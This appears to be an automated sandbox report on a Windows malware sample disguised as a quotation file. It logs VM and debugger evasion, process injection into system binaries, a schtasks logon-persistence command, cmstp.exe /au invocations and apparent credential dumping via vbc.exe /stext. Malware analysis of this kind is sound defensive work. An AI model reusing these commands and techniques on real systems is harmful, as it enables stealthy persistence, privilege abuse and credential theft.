Source: svchost.exe, 0000002A.00000002.1926881023.0000017F2EDDB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: svchost.exe, 0000002A.00000002.1926881023.0000017F2EDDB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware SVGA II
Source: Amcache.hve.25.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.25.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.25.dr	Binary or memory string: vmci.sys
Source: svchost.exe, 0000002A.00000002.1926881023.0000017F2EDDB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\WINDOWS\system32\drivers\vmmouse.sys
Source: Amcache.hve.25.dr	Binary or memory string: vmci.syshbin`
Source: svchost.exe, 0000002A.00000002.1926881023.0000017F2EDDB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmware
Source: Amcache.hve.25.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: svchost.exe, 0000002A.00000002.1926881023.0000017F2EDDB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\WINDOWS\system32\drivers\vmhgfs.sys
Source: svchost.exe, 0000002A.00000002.1926881023.0000017F2EDDB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: Amcache.hve.25.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.25.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.25.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.25.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.25.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.25.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.25.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.25.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.25.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: svchost.exe, 0000002A.00000002.1926881023.0000017F2EDDB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: noValueButYesKey)C:\WINDOWS\system32\drivers\VBoxMouse.sys
Source: svchost.exe, 0000002A.00000002.1926881023.0000017F2EDDB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\WINDOWS\system32\drivers\VBoxMouse.sys
Source: Amcache.hve.25.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.25.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.25.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.25.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

API call chain: ExitProcess graph end node

Source: C:\Users\user\Desktop\QUOTATION#30810.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Roaming\svchost.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process queried: DebugPort

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Code function: 20_2_100060E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

20_2_100060E2

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

32_2_0040DD85

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

26_2_0041CB50

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 20_2_10004AB4 mov eax, dword ptr fs:[00000030h]	20_2_10004AB4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 26_2_004432B5 mov eax, dword ptr fs:[00000030h]	26_2_004432B5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe	Code function: 45_2_004432B5 mov eax, dword ptr fs:[00000030h]	45_2_004432B5

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Code function: 20_2_1000724E GetProcessHeap,

20_2_1000724E

Source: C:\Users\user\Desktop\QUOTATION#30810.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 20_2_100060E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	20_2_100060E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 20_2_10002639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	20_2_10002639
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 20_2_10002B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	20_2_10002B1C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 26_2_004349F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	26_2_004349F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 26_2_00434B47 SetUnhandledExceptionFilter,	26_2_00434B47
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 26_2_0043BB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	26_2_0043BB22
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 26_2_00434FDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	26_2_00434FDC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe	Code function: 45_2_004349F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	45_2_004349F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe	Code function: 45_2_00434B47 SetUnhandledExceptionFilter,	45_2_00434B47
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe	Code function: 45_2_0043BB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	45_2_0043BB22
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe	Code function: 45_2_00434FDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	45_2_00434FDC

Source: C:\Users\user\Desktop\QUOTATION#30810.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

.NET source code references suspicious native API functions

Source: QUOTATION#30810.exe, ------.cs	Reference to suspicious API methods: LoadLibrary(_FD43_066C(_064F_FDE9_FD47_FD4E._0601_FDCD_065A))
Source: QUOTATION#30810.exe, ------.cs	Reference to suspicious API methods: GetProcAddress(intPtr, _FD43_066C(_064F_FDE9_FD47_FD4E._FDEA_064B_FBC0_06D9_FBCB_FBC8))
Source: QUOTATION#30810.exe, ------.cs	Reference to suspicious API methods: VirtualProtect(procAddress, (uint)array2.Length, 64u, out var _0611_064B)

Allocates memory in foreign processes

Source: C:\Users\user\AppData\Roaming\svchost.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe base: 400000 protect: page execute and read and write

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Roaming\svchost.exe	Memory written: C:\Windows\System32\svchost.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe base: 400000 value starts with: 4D5A

Maps a DLL or memory area into another process

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe protection: execute and read and write	Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\AppData\Roaming\svchost.exe	Memory written: C:\Windows\System32\svchost.exe base: 400000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Memory written: C:\Windows\System32\svchost.exe base: 401000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Memory written: C:\Windows\System32\svchost.exe base: 459000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Memory written: C:\Windows\System32\svchost.exe base: 471000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Memory written: C:\Windows\System32\svchost.exe base: 477000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Memory written: C:\Windows\System32\svchost.exe base: 478000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Memory written: C:\Windows\System32\svchost.exe base: 479000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Memory written: C:\Windows\System32\svchost.exe base: 47E000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 401000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 459000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 471000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 477000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 478000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 479000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 47E000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 235008	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 400000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 401000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 459000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 471000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 477000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 478000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 479000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 47E000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 5253008	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe base: 400000
Source: C:\Users\user\AppData\Roaming\svchost.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe base: 401000
Source: C:\Users\user\AppData\Roaming\svchost.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe base: 459000
Source: C:\Users\user\AppData\Roaming\svchost.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe base: 471000
Source: C:\Users\user\AppData\Roaming\svchost.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe base: 477000
Source: C:\Users\user\AppData\Roaming\svchost.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe base: 478000
Source: C:\Users\user\AppData\Roaming\svchost.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe base: 479000
Source: C:\Users\user\AppData\Roaming\svchost.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe base: 47E000
Source: C:\Users\user\AppData\Roaming\svchost.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe base: 4BE9008

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe		26_2_004120F7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe	Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe		45_2_004120F7

Source: C:\Users\user\AppData\Roaming\svchost.exe

Code function: 16_2_00007FFB4AFABC2C keybd_event,

16_2_00007FFB4AFABC2C

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

Code function: 26_2_00419627 mouse_event,

26_2_00419627

Source: C:\Users\user\Desktop\QUOTATION#30810.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#30810.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpDAAA.tmp.bat""	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"'	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout 3	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\System32\svchost.exe "C:\Windows\System32\svchost.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\Windows Mail\wab.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\System32\cmstp.exe "c:\windows\system32\cmstp.exe" /au C:\windows\temp\macatsxh.inf	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe /stext "C:\Users\user\AppData\Local\Temp\lmxgukvurszvufgxilvllznhpy"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe /stext "C:\Users\user\AppData\Local\Temp\nglqvdfonaraelcbsvimoeayympwa"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe /stext "C:\Users\user\AppData\Local\Temp\nglqvdfonaraelcbsvimoeayympwa"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe /stext "C:\Users\user\AppData\Local\Temp\yiqjvvqpbijnhrqfbgcgyquhzthfbppay"	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 444 -p 5864 -ip 5864	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 5864 -s 1120	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 460 -p 2772 -ip 2772	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 2772 -s 1072	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 536 -p 6908 -ip 6908	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6908 -s 1076	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe"
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\System32\cmstp.exe "c:\windows\system32\cmstp.exe" /au C:\windows\temp\54bmrp0l.inf
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\System32\cmstp.exe "c:\windows\system32\cmstp.exe" /au C:\windows\temp\xrlumlnf.inf

Source: vbc.exe, 00000014.00000002.4011008508.0000000000500000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager5C\a6s
Source: vbc.exe, 00000014.00000002.4011008508.0000000000500000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerF
Source: vbc.exe, 00000014.00000002.4011395180.000000000053F000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000014.00000002.4017737337.0000000007829000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: vbc.exe, 00000014.00000002.4017737337.0000000007829000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager-
Source: vbc.exe, 00000014.00000002.4011008508.0000000000500000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager5C\*r
Source: vbc.exe, 00000014.00000002.4011008508.0000000000500000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager5C\86)M
Source: vbc.exe, 00000014.00000002.4017737337.0000000007829000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager*
Source: vbc.exe, 00000014.00000002.4011008508.0000000000500000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager5C\ws
Source: vbc.exe, 00000014.00000002.4011008508.0000000000500000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager5C\
Source: vbc.exe, 00000014.00000002.4011008508.0000000000500000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager5C\on
Source: vbc.exe, 00000014.00000002.4011008508.0000000000500000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager5C\wsP/
Source: vbc.exe, 00000014.00000002.4011008508.0000000000500000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager5C\h;
Source: vbc.exe, 00000014.00000002.4011395180.000000000053F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managerr Profile InstallerkP
Source: vbc.exe, 00000014.00000002.4011008508.0000000000500000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: vbc.exe, 00000014.00000002.4011395180.000000000053F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \|Program Manager\|
Source: vbc.exe, 00000014.00000002.4011008508.0000000000500000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager5C\a6
Source: vbc.exe, 00000014.00000002.4011008508.0000000000507000.00000004.00000020.00020000.00000000.sdmp, logs.dat.20.dr	Binary or memory string: [Program Manager]
Source: vbc.exe, 00000014.00000002.4011008508.0000000000500000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager5C\33z
Source: vbc.exe, 00000014.00000002.4011008508.0000000000500000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager5C\ramt

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Code function: 20_2_10002933 cpuid

20_2_10002933

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: EnumSystemLocalesW,	26_2_00452036
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	26_2_004520C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: GetLocaleInfoW,	26_2_00452313
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: EnumSystemLocalesW,	26_2_00448404
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	26_2_0045243C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: GetLocaleInfoW,	26_2_00452543
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	26_2_00452610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: GetLocaleInfoA,	26_2_0040F8D1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: GetLocaleInfoW,	26_2_004488ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	26_2_00451CD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: EnumSystemLocalesW,	26_2_00451F50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: EnumSystemLocalesW,	26_2_00451F9B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe	Code function: EnumSystemLocalesW,	45_2_00452036
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	45_2_004520C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe	Code function: GetLocaleInfoW,	45_2_00452313
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe	Code function: EnumSystemLocalesW,	45_2_00448404
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	45_2_0045243C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe	Code function: GetLocaleInfoW,	45_2_00452543
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	45_2_00452610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe	Code function: GetLocaleInfoA,	45_2_0040F8D1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe	Code function: GetLocaleInfoW,	45_2_004488ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	45_2_00451CD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe	Code function: EnumSystemLocalesW,	45_2_00451F50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe	Code function: EnumSystemLocalesW,	45_2_00451F9B

Source: C:\Users\user\Desktop\QUOTATION#30810.exe	Queries volume information: C:\Users\user\Desktop\QUOTATION#30810.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Queries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Queries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Queries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformation	Jump to behavior
